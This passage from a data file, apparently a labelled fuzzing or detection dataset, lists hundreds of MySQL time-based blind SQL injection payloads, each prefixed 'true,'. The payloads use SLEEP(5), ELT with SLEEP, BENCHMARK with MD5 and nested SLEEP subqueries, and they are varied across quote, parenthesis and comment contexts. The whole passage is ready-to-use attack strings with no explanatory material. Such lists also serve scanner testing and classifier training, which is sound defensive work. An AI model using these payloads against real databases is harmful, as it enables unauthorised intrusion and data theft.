      "true,\" OR ELT(1337\u003d1337,SLEEP(5)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027||(SELECT 0x4c454f67 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027||(SELECT 0x727a5277 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+\u0027",
      "true,||(SELECT 0x57556971 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR \u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \"1337\"\u003d\"1337",
      "true,\") OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) OR \u00271337\u0027\u003d\u00271337",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337\u003d1337",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337\u003d1337",
      "true,)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337\u003d1337",
      "true,))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337\u003d1337",
      "true,1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`\u003d`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (\"1337\"\u003d\"1337",
      "true,\")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((\"1337\"\u003d\"1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND \"1337\"\u003d\"1337",
      "true,\") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (\"1337\" LIKE \"1337",
      "true,\")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((\"1337\" LIKE \"1337",
      "true,\" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\") WHERE 1337\u003d1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,1 and sleep 5--",
      "true,1 and sleep 5",
      "true,1 and sleep(5)--",
      "true,1 and sleep(5)",
      "true,\u0027 and sleep 5--",
      "true,\u0027 and sleep 5",
      "true,\u0027 and sleep 5 and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(5) and \u00271\u0027\u003d\u00271",
      "true,\u0027 and sleep(5)--",
      "true,\u0027 and sleep(5)",
      "true,\u0027 AnD SLEEP(5) ANd \u00271",
      "true,and sleep 5--",
      "true,and sleep 5",
      "true,and sleep(5)--",
      "true,and sleep(5)",
      "true,and SELECT SLEEP(5); #",
      "true,AnD SLEEP(5)",
      "true,AnD SLEEP(5)--",
      "true,AnD SLEEP(5)#",
      "true,\u0027 AND SLEEP(5)#",
      "true,\" AND SLEEP(5)#",
      "true,\u0027) AND SLEEP(5)#",
      "true,\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\" AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) AND \u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (\"1337\"\u003d\"1337",
      "true,\")) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (((\"1337\"\u003d\"1337",
      "true,\" AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND \"1337\"\u003d\"1337",
      "true,\") AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (\"1337\" LIKE \"1337",
      "true,\")) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) AND (((\"1337\" LIKE \"1337",
      "true,\" AND 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR \u003dBENCHMARK(5000000,MD5(0x774c5341))--",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341))-- 1337",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,%\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR \"1337\"\u003d\"1337",
      "true,\") OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR 1337\u003dBENCHMARK(5000000,MD5(0x774c5341)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR 1337\u003dBENCHMARK(5000000,MD5(0x576e7a57)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(5))--",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(5)) AND (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) AND ELT(1337\u003d1337,SLEEP(5)) AND ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) AND ELT(1337\u003d1337,SLEEP(5)) AND (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(5)) AND \u00271337\u0027\u003d\u00271337",
      "true,\u0027) AND ELT(1337\u003d1337,SLEEP(5)) AND (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) AND ELT(1337\u003d1337,SLEEP(5)) AND ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) AND ELT(1337\u003d1337,SLEEP(5)) AND (((\u00271337\u0027 LIKE \u00271337",
      "true,) AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) AND ELT(1337\u003d1337,SLEEP(5)) AND (1337\u003d1337",
      "true,)) AND ELT(1337\u003d1337,SLEEP(5)) AND ((1337\u003d1337",
      "true,))) AND ELT(1337\u003d1337,SLEEP(5)) AND (((1337\u003d1337",
      "true,1 AND ELT(1337\u003d1337,SLEEP(5))",
      "true,1 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 AND ELT(1337\u003d1337,SLEEP(5))# 1337",
      "true,) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,` WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,`) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1`\u003d`1` AND ELT(1337\u003d1337,SLEEP(5)) AND `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))|[1",
      "true,%\u0027 AND ELT(1337\u003d1337,SLEEP(5)) AND \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(5)) AND \u00271337\u0027 LIKE \u00271337",
      "true,\") AND ELT(1337\u003d1337,SLEEP(5)) AND (\"1337\"\u003d\"1337",
      "true,\")) AND ELT(1337\u003d1337,SLEEP(5)) AND ((\"1337\"\u003d\"1337",
      "true,\"))) AND ELT(1337\u003d1337,SLEEP(5)) AND (((\"1337\"\u003d\"1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(5)) AND \"1337\"\u003d\"1337",
      "true,\") AND ELT(1337\u003d1337,SLEEP(5)) AND (\"1337\" LIKE \"1337",
      "true,\")) AND ELT(1337\u003d1337,SLEEP(5)) AND ((\"1337\" LIKE \"1337",
      "true,\"))) AND ELT(1337\u003d1337,SLEEP(5)) AND (((\"1337\" LIKE \"1337",
      "true,\" AND ELT(1337\u003d1337,SLEEP(5)) AND \"1337\" LIKE \"1337",
      "true,\u0027 AND ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027||(SELECT 0x4c454f67 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027||(SELECT 0x727a5277 FROM DUAL WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))+\u0027",
      "true,||(SELECT 0x57556971 FROM DUAL WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 AND ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5))--",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5)) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR ELT(1337\u003d1337,SLEEP(5)) OR (\u00271337\u0027 LIKE \u00271337",
      "true,\u0027)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\u00271337\u0027 LIKE \u00271337",
      "true,\u0027))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\u00271337\u0027 LIKE \u00271337",
      "true,) OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) OR ELT(1337\u003d1337,SLEEP(5)) OR (1337\u003d1337",
      "true,)) OR ELT(1337\u003d1337,SLEEP(5)) OR ((1337\u003d1337",
      "true,))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((1337\u003d1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 OR ELT(1337\u003d1337,SLEEP(5))# 1337",
      "true,) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,` WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,`) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1`\u003d`1` OR ELT(1337\u003d1337,SLEEP(5)) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))|[1",
      "true,%\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337%\u0027\u003d\u00271337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027 LIKE \u00271337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(5)) OR (\"1337\"\u003d\"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\"1337\"\u003d\"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\"1337\"\u003d\"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(5)) OR \"1337\"\u003d\"1337",
      "true,\") OR ELT(1337\u003d1337,SLEEP(5)) OR (\"1337\" LIKE \"1337",
      "true,\")) OR ELT(1337\u003d1337,SLEEP(5)) OR ((\"1337\" LIKE \"1337",
      "true,\"))) OR ELT(1337\u003d1337,SLEEP(5)) OR (((\"1337\" LIKE \"1337",
      "true,\" OR ELT(1337\u003d1337,SLEEP(5)) OR \"1337\" LIKE \"1337",
      "true,\u0027 OR ELT(1337\u003d1337,SLEEP(5)) OR \u00271337\u0027\u003d\u0027FMTE",
      "true,\u0027) WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\" WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027||(SELECT 0x4c454f67 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027||(SELECT 0x727a5277 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||\u0027",
      "true,\u0027+(SELECT 0x4b6b486c WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+\u0027",
      "true,||(SELECT 0x57556971 FROM DUAL WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||",
      "true,||(SELECT 0x67664847 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))||",
      "true,+(SELECT 0x74764164 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5)))+",
      "true,\u0027)) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\")) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\u0027) AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,\") AS 1337 WHERE 1337\u003d1337 OR ELT(1337\u003d1337,SLEEP(5))-- 1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\u0027PBiy\u0027\u003d\u0027PBiy",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (1337\u003d1337",
      "true,)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((1337\u003d1337",
      "true,))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((1337\u003d1337",
      "true,1 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337",
      "true,) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,1 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,+(SELECT 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+",
      "true,)) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,) AS 1337 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,` WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`) WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,`\u003d`1` OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR `1`\u003d`1",
      "true,]-(SELECT 0 WHERE 1337\u003d1337 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027 OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\" OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337",
      "true,\u0027) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\u00271337\u0027\u003d\u00271337",
      "true,\u0027))) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR (((\u00271337\u0027\u003d\u00271337",
      "true,\u0027 OR (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) OR \u00271337\u0027\u003d\u00271337",
      "true,\u0027) OR (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) OR (\u00271337\u0027\u003d\u00271337",
      "true,\u0027)) OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ((\u00271337\u0027 LIKE \u00271337",
